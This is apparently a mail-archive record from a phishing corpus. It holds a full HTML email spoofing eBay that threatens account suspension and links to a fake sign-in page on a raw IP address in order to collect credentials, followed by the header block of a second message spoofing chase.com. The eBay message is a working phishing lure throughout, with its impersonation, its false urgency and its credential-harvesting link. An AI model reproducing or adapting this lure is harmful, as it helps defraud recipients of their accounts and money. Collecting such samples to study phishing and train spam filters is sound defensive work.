From: "eBay " <account@eBay.com>
Content-Type: text/html
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ****
X-Spam-Status: No, score=4.9 required=5.0 tests=HTML_MESSAGE,
	MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,NORMAL_HTTP_TO_IP,
	RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,RCVD_IN_XBL autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [80.34.193.146 listed in sbl-xbl.spamhaus.org]
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: O
X-Status: 
X-Keywords:                  
X-UID: 78

<html>
<body>

<a target="_blank" <br>
<div>
  <font face="Arial" size="2">
  <table cellSpacing="0" cellPadding="0" width="600" border="0">
    <tr bgColor="#ffe580">
      <td vAlign="center" width="575">
      <table cellSpacing="0" cellPadding="1" width="100%" border="0">
        <tr>
          <td vAlign="center" noWrap><strong>Dear valued customer</strong></td>
          <td vAlign="center" noWrap align="right">
          <a href="http://pages.ebay.com/help/new/signin.html" target="_blank" onfiltered="return
openHelpWindow(this.href);">
          <img src="http://pics.ebay.com/aw/pics/listings/questionMark_14x14.gif" border="0" width="14"
height="14"></a><img height="1" alt=" " src="http://pics.ebay.com/aw/pics/spacer.gif" width="4"><font face="Arial,
Helvetica, sans-serif" size="2"><a href="http://pages.ebay.com/help/new/signin.html" target="_blank" onfiltered="return
openHelpWindow(this.href);">Need
          Help?</a></font><img height="1" alt=" " src="http://pics.ebay.com/aw/pics/spacer.gif" width="2"></td>
        </tr>
      </table>
      </td>
    </tr>
    <tr>
      <td bgColor="#ffcc00" colSpan="2">
      <img height="2" alt=" " src="http://pics.ebay.com/aw/pics/spacer.gif" width="1"></td>
    </tr>
  </table>
  </font>
  <div>
&nbsp;</div>
  <div>
&nbsp;</div>
  <div>
    <font face="Arial" size="2">
    <div>
      <font face="Arial" size="2"><strong>
      <div>
        <div style="width: 605px; height: 224px">
          <font face="arial" color="#3366FF"> We regret to inform you that your eBay account
          could be suspended. </font>
          <p>
          <font face="arial"><font color="#3366FF">To
          resolve this problems please</font>
          <a
href="http://222.232.118.44/.www.ebay.com/signin.ebay.com/aw-cgi/eBayISAPI.dllSignIn-ssPageName-hhsin.php">
          <font face="arial" color="#000000">click here</font></a><font face="arial" size="2">
          <font color="#3366FF">and re-enter your account information. If your problems could not be
          resolved your account will be suspended for a period of 3-4 days,
          after this period your account will be terminated.</font></font></strong></p>
          <p><strong><font face="arial"
size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
          </font></strong>
          <font face="Arial" size="2"><strong>
          <font face="arial"><br>
          <br>
          For the User Agreement, Section 9, we may immediately issue a warning,
          temporarily suspend, indefinitely suspend or terminate your membership
          and refuse to provide our services to you if we believe that your
          actions may cause financial loss or legal liability for you, our users
          or us. We may also take these actions if we are unable to verify or
          authenticate any information you provide to us.<br>
          <br>
          Due to the suspension of this account, please be advised you are
          prohibited from using eBay in any way. This includes the registering
          of a new account. Please note that this suspension does not relieve
          you of your agreed-upon obligation to pay any fees you may owe to
          eBay.</font></div>
      </div>
      </strong></font>
    </div>
  </div>
  <font face="Arial" size="2"><strong></strong></font>
</div>
<div>
  <font face="Arial" size="2"><strong>
  <div>
&nbsp;</div>
  <div>
&nbsp;</div>
  <div>
    <br>
    <font face="arial">Regards,Safeharbor Department eBay, Inc
    <div>
&nbsp;</div>
  </div>
</div>
</font></strong></font>

</body>

</html>

From account@chase.com  Sun Dec  4 00:51:32 2005
Return-Path: <account@chase.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id AE7CE5370AE
	for <nobody@login.example.com>; Sun,  4 Dec 2005 00:51:31 -0500 (EST)
Received: from mail2.example.com (localhost.example.com [127.0.0.1])
	by mail2.example.com (Postfix) with ESMTP id 62CCA6FA3A0
	for <nobody@example.com>; Sun,  4 Dec 2005 00:51:28 -0500 (EST)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail2.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Sun,  4 Dec 2005 00:51:28 -0500 (EST)
Received: by lujan.example.com (Postfix)
	id AA2281BC3B; Sun,  4 Dec 2005 06:50:12 +0100 (CET)
Delivered-To: foobee@example.com
Received: from localhost (unknown [127.0.0.1])
	by lujan.example.com (Postfix) with ESMTP id 40F1E1BB3E
	for <foobee@example.com>; Sun,  4 Dec 2005 05:50:12 +0000 (UTC)
Received: from lujan.example.com ([10.2.3.4])
	by localhost (lujan [10.2.3.4]) (amavisd-new, port 10024)
	with ESMTP id 28183-06 for <foobee@example.com>;
	Sun, 4 Dec 2005 06:49:55 +0100 (CET)
Received: from 192.168.1.1 (unknown [64.25.4.246])
	by lujan.example.com (Postfix) with SMTP id 16C9A1BB16
	for <foobee@example.com>; Sun,  4 Dec 2005 06:49:54 +0100 (CET)
Received: from 4.28.57.25 by ; Sun, 04 Dec 2005 04:44:45 -0100
Message-ID: <NRVGYBVDWDIYQLPUYKURN@verizon.net>
